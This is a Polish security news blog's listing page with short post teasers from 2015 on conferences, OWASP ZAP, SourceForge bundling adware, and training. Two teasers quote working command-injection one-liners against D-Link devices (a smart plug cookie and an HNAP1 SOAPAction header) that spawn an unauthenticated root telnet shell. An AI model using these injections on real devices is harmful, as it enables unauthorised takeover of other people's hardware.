Poznaj AI! Obejrzyj bezpłatnie szkolenie jutro o godz. 10:00 lub 19:00

Cybergov – konferencja o ITsec dla administracji publicznej

16 czerwca 2015, 11:40 | W biegu | komentarze 2

Już za dwa dni (18 czerwca 2015) startuje w Warszawie konferencja CyberGOV.  Jest to wydarzenie kierowane typowo do instytucji publicznych, a dokładniej tych zainteresowanych szeroko pojętym bezpieczeństwem IT. W agendzie cieszy na pewno to, że organizatorzy zaprosili do wystąpienia sporo zagranicznych prelegentów – choćby Andreasa Koenena, z prezentacją: „Organizacja systemu…

Czytaj dalej »

Nowa wersja OWASP ZAP – narzędzia do testowania bezpieczeństwa aplikacji www

16 czerwca 2015, 11:07 | W biegu | 0 komentarzy

Od jakiegoś już czasu dostępna jest nowa wersja 2.4.0 tego popularnego (i bezpłatnego) narzędzia do testowania bezpieczeństwa aplikacji webowych. Nowa wersja ZAP-a o tyle cieszy, że wydawało się już że rozwój projektu stanął (jak w przypadku innych podobnych narzędzi budowanych pod skrzydłami OWASP – przykład: Webscarab). Cały rozwój wydaje się…

Czytaj dalej »

Crapware na sourceforge – ucieczka znanych projektów

15 czerwca 2015, 12:08 | W biegu | komentarzy 5

Ostatnio Sourceforge przejmuje na swojej platformie konta znanych projektów. Jakiś czas temu był to GIMP (tutaj SF dodawało do instalatora GIMP-a własny ad-ware/pay-ware), parę dni temu nmap (!). Dołączają też inne znane projekty, 14-czerwca wymigrował z Sourceforge Notepad++, tłumacząc to po prostu tak: SourceForge was a good place; unfortunately, sometimes…

Czytaj dalej »

D-Link Smart Plug. Zdalne wykonanie kodu / SQLi / itd. – do wyboru do koloru ;-)

12 czerwca 2015, 15:15 | W biegu | 0 komentarzy

Peter Adkins umieścił na githubie swoje badania nad inteligentnym gniazdkiem elektrycznym D-Linka (DSP-W110).   Nie będę jeszcze raz wszystkiego przepisywał z oryginalnego researchu ;) ale odpalenie shella wygląda tu bajecznie prosto: # Spawn a root shell (telnet) curl \ –cookie „terribleness=\`telnetd -l/bin/sh\`” \ 192.168.1.3 Podobnie wygląda historia z uploadem dowolnego…

Czytaj dalej »

Rozwal.to konkurs z pulą nagród 2,2kpln

11 czerwca 2015, 10:35 | W biegu | komentarzy 12

Zwróciła się do nas pewna firma z prośba o pewną promocję ich inicjatywy. Z naszej strony padła propozycja organizacji konkursu na rozwal.to (swoją drogą mamy tu już prawie 900 aktywnych kont!). I mamy na to zielone światło. Pula nagród, która jest tu do wykorzystania to 2 200 PLN – które…

Czytaj dalej »

Zaawansowany monitoring ITsec oraz obsługa incydentów IT – szkolenie

10 czerwca 2015, 15:31 | W biegu | 1 komentarz

Mamy dla Was relatywnie nową propozycję szkoleniową: 2-dniowe autorskie warsztaty z obszaru technicznego monitoringu bezpieczeństwa IT. Temat wydaje się być mocno na czasie, biorąc pod uwagę choćby ostatnie doniesienia kolegów z z3s.pl. Warsztaty prowadzi Przemek Skowron, wcześniej odpowiedzialny m.in. za stworzenie zespołu CSIRT dla Grupy Alior Bank. Przemek posiada już co…

Czytaj dalej »

Hakowanie na żywo aplikacji webowych – we Wrocławiu

01 czerwca 2015, 15:38 | W biegu | komentarzy 5

Już 8.06.2015 na spotkaniu WrotQA (wrocławska grupa testerów) będzie można zobaczyć naszą prezentację o bezpieczeństwie aplikacji www. Na żywo pokazanych będzie kilka nietypowych (choć krytycznych) podatności w aplikacjach webowych: m.in. niedawno zlokalizowane krytyczne błędy w Nuxeo (temat ten prezentowałem po raz pierwszy  tydzień temu na konferencji Confidence). Całość pokazywana będzie…

Czytaj dalej »

Kolejna edycja zaawansowanego szkolenia Mario Heiderich-a

28 maja 2015, 10:39 | W biegu | 0 komentarzy

Niedługo (22-23.06.2015) rusza w Krakowie druga edycja szkolenia: Offensive HTML, SVG, CSS and other Browser-Evil. O samym szkoleniu już pisaliśmy jakiś czas temu przy okazji pierwszej edycji tego kursu. Warto tu przypomnieć, że całość prowadzi światowej renomy badacz bezpieczeństwa – Mario Heiderich. A podsumowując – jest to propozycja przeznaczona dla…

Czytaj dalej »

Nowe D-Linki – nowy sposób na zdobycie roota bez uwierzytelnienia

11 kwietnia 2015, 12:40 | W biegu | 1 komentarz

Niedawno pisaliśmy o nowych D-Linkach, a teraz pojawiło się ciekawe badanie pokazujące w jaki sposób zrealizować nieuwierzytelniony dostęp na root-a. Wystarczy jeden prosty request HTTP… wget –header=’SOAPAction: „http://purenetworks.com/HNAP1/GetDeviceSettings/`telnetd`”’ http://192.168.0.1/HNAP1 $ telnet 192.168.0.1 Trying 192.168.0.1… Connected to 192.168.0.1. Escape character is '^]’. BusyBox v1.14.1 (2015-02-11 17:15:51 CST) built-in shell (msh) Enter…

Czytaj dalej »